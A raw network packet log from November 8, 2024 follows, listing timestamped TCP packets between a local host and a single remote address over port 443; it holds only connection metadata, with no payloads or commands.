Nov 8, 2024 16:16:11.350258112 CET	443	62044	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.350753069 CET	443	62043	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.350903988 CET	443	62043	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.350961924 CET	62043	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.351011038 CET	62043	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.351033926 CET	443	62043	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.351043940 CET	62043	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.351048946 CET	443	62043	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.352993011 CET	62048	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.353029013 CET	443	62048	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.353125095 CET	62048	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.353174925 CET	62049	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.353218079 CET	443	62049	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.353245974 CET	62048	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.353266954 CET	443	62048	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.353280067 CET	62049	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.353455067 CET	62049	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.353471994 CET	443	62049	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.578818083 CET	443	62045	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.579574108 CET	62045	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.579605103 CET	443	62045	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.580076933 CET	62045	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.580082893 CET	443	62045	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.708278894 CET	443	62045	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.708360910 CET	443	62045	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.708415985 CET	62045	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.708533049 CET	62045	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.708558083 CET	443	62045	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.708569050 CET	62045	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.708575964 CET	443	62045	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.711057901 CET	62050	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.711097002 CET	443	62050	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.711165905 CET	62050	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.711297035 CET	62050	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.711309910 CET	443	62050	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.951289892 CET	443	62046	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.951787949 CET	62046	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.951824903 CET	443	62046	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.952280045 CET	62046	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.952289104 CET	443	62046	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.955830097 CET	443	62047	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.956091881 CET	62047	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.956119061 CET	443	62047	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.956459999 CET	62047	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.956465006 CET	443	62047	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.084552050 CET	443	62046	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.084795952 CET	443	62046	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.084841013 CET	62046	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.084887028 CET	62046	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.084918022 CET	443	62046	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.084938049 CET	62046	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.084948063 CET	443	62046	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.087800980 CET	62051	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.087851048 CET	443	62051	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.087903976 CET	62051	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.088061094 CET	62051	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.088073015 CET	443	62051	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.094228983 CET	443	62049	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.094347954 CET	443	62048	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.094574928 CET	62049	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.094588995 CET	443	62049	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.094820976 CET	62048	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.094835997 CET	443	62048	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.095057964 CET	443	62047	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.095062017 CET	62049	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.095067978 CET	443	62049	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.095273018 CET	443	62047	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.095292091 CET	62048	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.095297098 CET	443	62048	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.095320940 CET	62047	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.095323086 CET	443	62047	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.095360994 CET	62047	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.095500946 CET	62047	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.095519066 CET	443	62047	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.095537901 CET	62047	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.095544100 CET	443	62047	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.098020077 CET	62052	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.098064899 CET	443	62052	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.098126888 CET	62052	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.098426104 CET	62052	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.098438978 CET	443	62052	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.225591898 CET	443	62049	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.225676060 CET	443	62049	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.225708008 CET	443	62048	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.225733042 CET	62049	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.225801945 CET	443	62048	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.225841045 CET	62048	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.225935936 CET	62049	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.225960016 CET	443	62049	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.225971937 CET	62049	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.225977898 CET	443	62049	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.226830006 CET	62048	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.226849079 CET	443	62048	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.226861954 CET	62048	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.226867914 CET	443	62048	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.229312897 CET	62053	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.229350090 CET	443	62053	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.229438066 CET	62053	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.229577065 CET	62053	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.229589939 CET	443	62053	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.230055094 CET	62054	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.230098963 CET	443	62054	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.230457067 CET	62054	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.230457067 CET	62054	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.230493069 CET	443	62054	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.433306932 CET	443	62050	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.433856010 CET	62050	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.433881044 CET	443	62050	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.434318066 CET	62050	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.434323072 CET	443	62050	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.562148094 CET	443	62050	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.562186956 CET	443	62050	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.562243938 CET	443	62050	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.562278986 CET	62050	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.562323093 CET	62050	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.562577009 CET	62050	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.562596083 CET	443	62050	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.562608957 CET	62050	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.562613964 CET	443	62050	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.565632105 CET	62055	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.565670967 CET	443	62055	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.565738916 CET	62055	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.565875053 CET	62055	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.565887928 CET	443	62055	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.808768988 CET	443	62051	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.811815023 CET	62051	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.811851978 CET	443	62051	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.812273026 CET	62051	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.812278986 CET	443	62051	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.827339888 CET	443	62052	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.876935005 CET	62052	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.943440914 CET	443	62051	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.943509102 CET	443	62051	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.943603992 CET	62051	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:12.956521988 CET	443	62053	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:12.957900047 CET	443	62054	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.001916885 CET	62053	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.002326012 CET	62054	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.040527105 CET	62052	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.040556908 CET	443	62052	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.040956020 CET	62052	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.040961981 CET	443	62052	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.044660091 CET	62051	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.044686079 CET	443	62051	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.048238993 CET	62053	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.048252106 CET	443	62053	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.048650026 CET	62053	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.048655033 CET	443	62053	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.059741020 CET	62054	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.059765100 CET	443	62054	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.060106993 CET	62054	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.060111046 CET	443	62054	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.076024055 CET	62056	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.076070070 CET	443	62056	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.076152086 CET	62056	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.079421997 CET	62056	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.079432964 CET	443	62056	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.166838884 CET	443	62052	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.166870117 CET	443	62052	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.166943073 CET	62052	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.166975975 CET	443	62052	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.167479038 CET	443	62052	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.167541981 CET	62052	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.172101974 CET	62052	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.172120094 CET	443	62052	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.172168016 CET	62052	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.172173977 CET	443	62052	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.173383951 CET	443	62053	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.173410892 CET	443	62053	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.173458099 CET	62053	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.173470974 CET	443	62053	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.173625946 CET	443	62053	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.173701048 CET	62053	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.173701048 CET	62053	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.173701048 CET	62053	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.173722982 CET	443	62053	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.186218023 CET	443	62054	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.186249018 CET	443	62054	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.186327934 CET	443	62054	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.186358929 CET	62054	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.186395884 CET	62054	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.214796066 CET	62057	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.214857101 CET	443	62057	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.214941025 CET	62057	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.215423107 CET	62054	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.215423107 CET	62054	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.215439081 CET	443	62054	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.215449095 CET	443	62054	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.218183994 CET	62058	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.218224049 CET	443	62058	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.218300104 CET	62058	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.218332052 CET	62057	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.218346119 CET	443	62057	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.218424082 CET	62058	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.218432903 CET	443	62058	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.219573975 CET	62059	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.219583988 CET	443	62059	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.219634056 CET	62059	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.220020056 CET	62059	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.220035076 CET	443	62059	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.338329077 CET	443	62055	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.338917971 CET	62055	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.338939905 CET	443	62055	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.340040922 CET	62055	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.340048075 CET	443	62055	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.470756054 CET	62053	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.470788956 CET	443	62053	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.475895882 CET	443	62055	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.475918055 CET	443	62055	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.475979090 CET	443	62055	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.475986004 CET	62055	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.476022959 CET	62055	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.476285934 CET	62055	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.476296902 CET	443	62055	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.476310015 CET	62055	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.476314068 CET	443	62055	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.480942011 CET	62060	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.480987072 CET	443	62060	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.481093884 CET	62060	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.481267929 CET	62060	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.481288910 CET	443	62060	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.811660051 CET	443	62056	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.812092066 CET	62056	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.812122107 CET	443	62056	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.812542915 CET	62056	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.812547922 CET	443	62056	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.941445112 CET	443	62056	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.941817045 CET	443	62057	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.942042112 CET	443	62056	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.942112923 CET	62056	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.942183018 CET	62056	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.942200899 CET	443	62056	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.942225933 CET	62056	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.942231894 CET	443	62056	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.942300081 CET	62057	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.942325115 CET	443	62057	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.942739010 CET	62057	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.942755938 CET	443	62057	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.945131063 CET	62061	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.945168972 CET	443	62061	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.945259094 CET	62061	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.945411921 CET	62061	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.945430040 CET	443	62061	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.951627016 CET	443	62059	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.951957941 CET	62059	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.951975107 CET	443	62059	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.952348948 CET	62059	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.952353954 CET	443	62059	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.962817907 CET	443	62058	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.963165045 CET	62058	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.963177919 CET	443	62058	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:13.963577986 CET	62058	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:13.963582993 CET	443	62058	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.069567919 CET	443	62057	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.069637060 CET	443	62057	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.069760084 CET	62057	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.069957972 CET	62057	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.069979906 CET	443	62057	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.069993973 CET	62057	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.069999933 CET	443	62057	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.073115110 CET	62062	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.073168039 CET	443	62062	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.073256016 CET	62062	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.073430061 CET	62062	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.073438883 CET	443	62062	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.081187010 CET	443	62059	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.081264973 CET	443	62059	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.081302881 CET	62059	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.081393003 CET	62059	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.081399918 CET	443	62059	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.081413031 CET	62059	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.081418037 CET	443	62059	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.083674908 CET	62063	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.083719969 CET	443	62063	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.083822012 CET	62063	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.083952904 CET	62063	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.083967924 CET	443	62063	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.094609022 CET	443	62058	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.094881058 CET	443	62058	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.094944000 CET	62058	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.094969034 CET	62058	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.094980001 CET	443	62058	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.094990015 CET	62058	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.094995022 CET	443	62058	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.096913099 CET	62064	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.096930027 CET	443	62064	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.096987963 CET	62064	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.097090960 CET	62064	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.097100019 CET	443	62064	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.219055891 CET	443	62060	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.219624996 CET	62060	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.219649076 CET	443	62060	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.220082998 CET	62060	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.220087051 CET	443	62060	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.349596024 CET	443	62060	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.349631071 CET	443	62060	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.349692106 CET	443	62060	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.349725008 CET	62060	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.349841118 CET	62060	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.349953890 CET	62060	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.349966049 CET	443	62060	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.349978924 CET	62060	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.349983931 CET	443	62060	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.352634907 CET	62065	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.352679968 CET	443	62065	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.352752924 CET	62065	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.352895975 CET	62065	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.352905989 CET	443	62065	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.672317982 CET	443	62061	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.672863007 CET	62061	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.672890902 CET	443	62061	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.673345089 CET	62061	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.673351049 CET	443	62061	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.801314116 CET	443	62061	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.801351070 CET	443	62061	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.801476955 CET	62061	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.801503897 CET	443	62061	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.801691055 CET	443	62061	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.801723957 CET	62061	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.801748991 CET	443	62061	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.801763058 CET	62061	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.801763058 CET	62061	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.801772118 CET	443	62061	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.801784039 CET	443	62061	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.804934025 CET	62066	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.804980993 CET	443	62066	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.805053949 CET	62066	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.805212021 CET	62066	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.805226088 CET	443	62066	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.809145927 CET	443	62062	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.809665918 CET	62062	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.809700966 CET	443	62062	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.810163975 CET	62062	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.810178041 CET	443	62062	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.821628094 CET	443	62063	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.822197914 CET	62063	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.822223902 CET	443	62063	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.822783947 CET	62063	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:14.822791100 CET	443	62063	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:14.826617002 CET	443	62064	13.107.246.45	192.168.2.10
